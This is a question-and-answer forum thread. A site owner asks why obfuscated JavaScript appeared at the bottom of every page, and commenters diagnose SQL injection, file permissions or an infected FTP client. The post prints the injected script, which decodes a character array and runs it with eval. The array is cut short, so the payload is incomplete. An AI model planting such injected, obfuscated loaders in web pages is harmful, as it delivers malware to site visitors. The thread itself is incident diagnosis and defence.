# Website Security - Hacked by this JS script

Tags: javascript, security, hosting

Our site is hosted on a rather popular .NET hosting provider. So I *assume* it is secured and problem is on our side. Please tell me if I am wrong.

I received complaints from my website saying it has virus in it. So I go check the home page.

I noticed in every page we have the following extra piece of script at the bottom of the page!

```
<script>
try{document["b"+"o"+"d"+"y"]*=document}
catch(dgsgsdg){zxc=12;ww=window;}
try{d=document["createElement"]("span");}
catch(agdsg){zxc=0;}
try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}
catch(bawetawe){if(ww.document){v=window;
n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h" .... ];
//truncated for security reasons

h=2;s="";if(zxc){for(i=0;i-632!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}</script><script>try{window.document.body/=2}catch(dgsgsdg){zxc=12;ww=window;}if(zxc){try{f=document.createElement("div");}catch(agdsg){zxc=0;}try{document.body--;}catch(bawetawe){if(ww.document){v=window;
n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h" .... ];
//truncated for security reasons

h=2;s="";if(zxc){for(i=0;i-632!=0;i++){k=i;s+=String["fro"+"mC"+"harCode"]
(parseInt(n[i],12*2+1+1));}z=s;ww["eval"](s);}}}}
</script></body>
```

Only I know the password and I sware didn't give it to anyone. The password is random and up to the security standard, we change the password about once a year, no very frequent I know, but I guess it is okay.

Questions are:

1. WTF is this script doing? How can I reverse-engineer the n=["9".....] array? I want to find a trace.
2. In what possible ways did we screwed up and let the hacker come in? In this case could he have done it in anyway other than bruce force our password and got lucky?

Comment: Is the site running a CMS or other dynamic content to generate the pages that contain the javascript? It's possible there was a vulnerability in that server-side code.

Comment: Sorry, I wasn't clear enough. They are .aspx pages hand written by me. After internal company staff logged in, they can do some simple CRUD against the SQL database to record some information...That is pretty much the main purpose of the site.

Comment: Ok, I would guess that is how you were attacked. You'll want to look for places where SQL injection may have been possible, as well as looking over any parts of the app that have permission to write to directories "inside" the app.

Comment: To fix your immediate problem, can you tell whether the script could be coming from a field in your database that's written to every page? Or does it appear to be embedded in an ASPX page itself?

Comment: hmm. thanks for your fast response. it is a hardcoded piece of script on every page.

Comment: By that, do you mean it's in the raw source when you open the ASPX files in an editor?

Comment: yes, the script is exactly as shown in the code block above sitting in every .aspx or .html pages... when I exam further, all other files seem intact, including some .exe file for internal staff download. Also, just checked the DB, also looks ok, doesn't seem to have data loss.

Comment: Ok. That implies that (unless your login was brute-forced) your app may have write permission to its own directories, and that some security flaw in it was used to overwrite its own files. That would be my guess anyway.

Comment: Thanks a lot for your suggestions. I will check the file permissions to see if I can fix it.

Comment: A snippet at the bottom of every page is usually an indication that your FTP program is infected and needs to be removed/changed.

Comment: Additionally change your FTP password too to be safe..

Comment: Techfoobar, it is very likely now that you mentioned it. My CuteFTP (purchased & licensed) that I used to upload the site was crashing everytime I started it a while ago. I was wondering why, but the anti-virus software(s) didn't report anything, so I thought it was incompatible with my system. I didn't pay much attention!

Comment: Looks like i am not the only one, too. http://forums.globalscape.com/PrintTopic30605.aspx

Comment: Replace the `eval` by `alert` and you should see the source that should be evaluated.

Answer (score 1, accepted):

"A snippet at the bottom of every page is usually an indication that your FTP program is infected and needs to be removed/changed. – techfoobar"

Although I am not 100% sure, but I think techfoobar is correct. The FTP software I was using to upload the site must have been infected. I don't know how it happened, but it is crashed and no longer functioning in the OS now.